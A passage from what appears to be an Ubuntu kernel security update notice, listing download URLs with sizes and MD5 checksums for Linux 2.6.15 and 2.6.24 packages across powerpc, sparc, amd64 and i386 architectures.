http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54_2.6.15-54.77_powerpc.deb Size/MD5: 6946740 28fc20a94d95b0b8c02aca0708a74101 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-powerpc-smp_2.6.15-54.77_powerpc.deb Size/MD5: 22776364 389e45cbdd998fa7dafa1229f5737bcb http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-powerpc64-smp_2.6.15-54.77_powerpc.deb Size/MD5: 23678834 ea0a1438c2b0a5334b7ac71407cbc868 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-powerpc_2.6.15-54.77_powerpc.deb Size/MD5: 22355382 18f2e503843c54824551f54d39b8b468 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 17782 9933c39eaa26b6c5558399d461d6e4aa http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 17380 4f213deee9b7c625c1fd48d88f048c6c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 261268 d73545c9cef2251ad094e9e53f889421 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 282478 b037d7889d3f63d86c3605c945f081dc http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 227640 d6a097d06e05da8ae4676497fe918633 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 248884 ca8a5caa96f92834425d7ee4a48a95e2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 1048444 f58af64355ebfa8d71973d7961285aea http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 1048566 32f48ed1ee827656c9446c79d6802b99 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 1737706 67f6c275ca396042f8613936eda72c97 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 1877428 8d0bbebe4eb6e4bf964fb6f440af7789 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 250878 c171495228a2d3f25a5dab6a1d46ffe5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 233632 c6062b42d12fa38bc5fcb59261bfa528 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 13026 e2a2a9c9c0a66e0f66e4971456becb07 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 13526 6393b9447870a049537c64f1da8c0984 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 84832 dafa241b2ba2792acc11ed92ebf58d8a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 52194 9d681e1cde559db52f919d9a75da2987 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 73908 1b9eea0eb286147c629a5eb6a737bf68 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 85844 9d8a5108c045be78f3aa16ec41863d49 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 6624 c39e697a9b25473e791b7668df4798d5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 7064 02c208ead4772ebd6dfaa1ee19df56cf http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 60376 b83d6031ce6298fd19869d5d29e3a0c4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 70392 cbaee4dfd466a12dff0b9098baa8788d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 128550 e4821e65980d609ef08066b2780a485a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 157808 9a1b4e218e785ecef63b0406c5f9c8a5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 108038 b472765900eaa08cc2cc54a2ae26d907 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 126050 75623f4ca292e6d3fc2b6e00211f964b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 87304 2ff71c1735a777692a08170ed726345b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 93306 ee8b741bf1ee4f57a90da0ed2b6da7d8 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 2013972 dac2efef3ff9d6289b7309d57cb72745 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 1988102 c8d45fc53efb2b9f324547fd06ae7409 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 104106 14ccbc627fb90ae558e79b3833e5ba6b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 115702 19934a14896949c68acbe6f4b6459b0a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 12738 31ecc1891237ac01baa6d70fa55b2ffa http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 14444 a638ce85cd817ffcd0316b798067af0b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 39948 0fad0a28b3b61dbce21d2ab2d3e385ec http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 41474 4c179c6570402716b5e16076ee359ff9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 149308 d381b35191480574c053f931f5d4b838 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 168034 937d9f0067d9c5b86f547355a759ce3a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 42272 9adfaeeaeec83a69f60bba08b9f7029e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 44880 8be844f59b2578d8b0b96df521ed2980 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb Size/MD5: 320284 ed49feb1ad11dbe9eaebdf8e3b55aa14 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb Size/MD5: 324712 00dc7e4c517a8e77dbdbcd472560fd07 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb Size/MD5: 50478 90ae6fcda7578bfc42fb227db6ed4a16 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb Size/MD5: 2362 81e28a5627bcd9793bdb3d7d66c808e0 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb Size/MD5: 40332 bba6454e4e7a730fc19a71e9f177591b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb Size/MD5: 110530 ee2bc9880d4119adc01104c26f4c9b45 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb Size/MD5: 41186 22e3751924678d62633868c319ec33bb http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb Size/MD5: 104238 f5357492d5c611bd51c4724b1b955972 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb Size/MD5: 7438 6e66a60e61009df9bc350cde8318fd0e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb Size/MD5: 149008 d39a3d71f7cdaa48f4603f0d40d7183d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb Size/MD5: 1711722 024c561786c0bfc1f337cc46a1a99842 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-sparc64-smp_2.6.15-54.77_sparc.deb Size/MD5: 772116 b88f78698771d7b662bd8f55da837860 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-sparc64_2.6.15-54.77_sparc.deb Size/MD5: 771542 ade51cbe986056b296fc493d071add8f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54_2.6.15-54.77_sparc.deb Size/MD5: 6963002 734ea162d7bdae6fa642fbb65fc4aefd http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-sparc64-smp_2.6.15-54.77_sparc.deb Size/MD5: 15009480 f11efad62b8121702c97f681aaeff50c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-sparc64_2.6.15-54.77_sparc.deb Size/MD5: 14829506 72058abf59e768b6e7a962a0f1765772 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb Size/MD5: 7422 0fa7e99c434b4c2e616b163473d2482d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb Size/MD5: 248670 395da4afc2eea6417478e5b9df10eac9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb Size/MD5: 212452 381c41cde8488c4b922e0d13250ac60d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb Size/MD5: 1048468 d00527551222987b228c1b3a236b33fa http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb Size/MD5: 1481892 c2a73def45b9c272b0f1b16b24072f74 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb Size/MD5: 10118 6c152d785d4130d9189dfc5562b2918d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb Size/MD5: 40180 bfdd5a38c85c337948efc354d5b52b1b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb Size/MD5: 9370 a6b288b0cddcba37aa113b6c6a82c1ac http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb Size/MD5: 61482 f6d84c317c95ca51e4a3a961edd4afbc http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb Size/MD5: 163022 75d6fbd3830d3fa83a4a33087893230f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb Size/MD5: 64010 b2c069e1a9ab296b69db1c9d9347fdb5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb Size/MD5: 1235086 983bf44bbfed30448fc00b43e525a222 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb Size/MD5: 59354 ce272f6264ab0b9731c489358ffae596 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb Size/MD5: 37406 39fb3eb53208a1810ef284874296c3ac http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb Size/MD5: 280076 7716ed5dd3c520a43c3774a4e3633047 Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-24.55.diff.gz Size/MD5: 4767049 a3e6ddfbd5081bb6e7535fcde2a3f609 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-24.55.dsc Size/MD5: 2219 ddc04a20e187b20a43a5cecc952e4b59 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz Size/MD5: 59085601 e4aad2f8c445505cbbfa92864f5941ab Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-24.55_all.deb Size/MD5: 4928644 067a5db90758e43f49badf44aadc2ae2 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24_2.6.24-24.55_all.deb Size/MD5: 8142948 27ced16bc9ee340f7d2e59c4d03d4175 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-24.55_all.deb Size/MD5: 96898 a53b271582fb8cb0f8aa7a3e6ef32d02 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-24.55_all.deb Size/MD5: 46978434 5338ae19db39ce537ea7f81fbdfc4a62 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 28590 3b10ec843d4ca2b68122730e1a14b331 http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 224138 5ef7d9b5cad79f6e5b10f8a004ec5cf4 http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 52646 d4bf1babe03ceacbe09131b76a14b9cd http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 40622 8e880c89feeb75ddcb97eff9a1d2fb3c http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 48658 639f3170e278823641666c3355710ce9 http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 86268 b2ae6f9d0f3397ab9d56b5ee2604f176 http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 36310 1f5d7ef1723c827f6ec1727b3787f3a9 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 648378 1e2bb0cf23d1a130795cd9f745e76fe7 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 209694 0235e8c39f85c8c59e5d8992d2c4d3fa http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 39192 40b6ff3fb69584a473fd285329e2e2b2 http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 67952 06997f3f9fd155b9d8fd19ed840a7f46 http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 145266 94a9d3bf11d07fda05ba8d37e488c75e http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 286678 5b1c737aa948d6e03fdc79cea2467968 http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 2128784 32fc2ee9b3e3e5fb2b1c8a2522acc991 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-generic_2.6.24-24.55_amd64.deb Size/MD5: 671194 533f220e2ed87ae41437a2e46d1135bb http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-openvz_2.6.24-24.55_amd64.deb Size/MD5: 1251290 0c12f1ec5d33bf9b98a2cf65411f0cf6 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-rt_2.6.24-24.55_amd64.deb Size/MD5: 1273382 3dd530222979fbc4a0ec5846be3daa2b http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-server_2.6.24-24.55_amd64.deb Size/MD5: 671242 608ed557543bc3b12872b8731ac5594c http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-xen_2.6.24-24.55_amd64.deb Size/MD5: 1082876 c87e898e14f6037d1e4ad8c2c9fbe726 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-24-generic_2.6.24-24.55_amd64.deb Size/MD5: 17801664 16b23af9d06baf9c80b4ffc5b2ac8ce0 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-24-server_2.6.24-24.55_amd64.deb Size/MD5: 17771428 8122d12f5082445f9603d13335b83515 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-24-generic_2.6.24-24.55_amd64.deb Size/MD5: 21014464 68b73490ad11f3343768b5c201c70b25 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-24-server_2.6.24-24.55_amd64.deb Size/MD5: 21387618 3b1bee21e40c69175cd5d1d45c5bf353 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-24.55_amd64.deb Size/MD5: 705286 db77b2afae66f80b6692bb8a19cc602e http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 263680 7f27a9bbc9cefe36cf9dc85d16423bc7 http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 176350 b51e4026bc049983ebd216f31169a41e http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 253928 a60545ac2ad4d8cdaf08da09e555ad08 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 1640052 b5d649f457aecfccea9ee1758b546bd9 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 143684 0290beaef1a4ae3e291e20c517b979cb http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 164328 9124879a405d861d756f6dbeb40485b0 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 115838 6edbfc0f6d64e81778feec9bbe7d0388 http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 35062 34b4bfd673f5b69d6a66d357d53913e8 http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 64396 8913719a5eb39424e244f3aa3923ad56 http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 69694 0a45f71737115cdcc8a8a7979bc9c01e http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 21592 1e5dfd4b78a18cbe0615bfe4e656241d http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 8618 3353256d9abc6aac3c8904247fad36a8 http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 57178 34272f15a47eaead9a3bb5e8cabc99fe http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 102988 16f8a54269e7acfeec29642135518312 http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 1212082 7bfdf05b2a0e7a3e2a9bd69bfb74929a http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 45470 57609f5c992b83ab16b19cb8bdacff4a http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 12772 ddb48f6ed471562112661169d41c09c3 http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 497808 bd328b4bfef64c9afaddaee236abdb91 http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb Size/MD5: 74980 db1542ff52ce70a7fa58d678e70d1ab7 http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-24-openvz_2.6.24-24.55_amd64.deb Size/MD5: 19242994 1c7114da74f213cc5cdb9599ecf7233d http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-24-rt_2.6.24-24.55_amd64.deb Size/MD5: 17890604 f7c54711409ec7c911b89a9e8d3cef47 http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-24-xen_2.6.24-24.55_amd64.deb Size/MD5: 18900390 a6502ae7ee82cf1393310e22903b2763 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 23682 1c7aab194616a471285a9d250127a835 http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 26764 92a84719d2c4883b366d6d68d1820120 http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 218684 eb3d8b92d6c4a48245724997a6121fc2 http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 220440 40b53586ca28797dc014b8f656cf4725 http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 51932 80258fa2f467ec10a1ec94ba389a247e http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 52062 d84d679039a1dcb7a7a6e2be9a11bc9a http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 38324 ff2e0a017b7f58e42c276911d2b763ea http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 39080 50426ae4e5c02d35e95c5351665417cb http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 45866 27ce55188a7e0726ea19ac778c1b20bf http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 46012 ec9111a5e17c2b7cf80a8ec9d7eb574e http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 83200 c17e82497048c7e436642aa16a8b4177 http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 83580 d683701699212dcc121fb6c59096a766 http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 32396 2476d6800fd166d9923a3b25e7284e37 http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 32674 15560eb3ad638e98cf61e9ba41f59040 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb Size/MD5: 637392 0fecf174e6f568e2c6c7dad168bc3841 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb Size/MD5: 655480 3296fe2e55062e3b5b4b39e79e2104c6 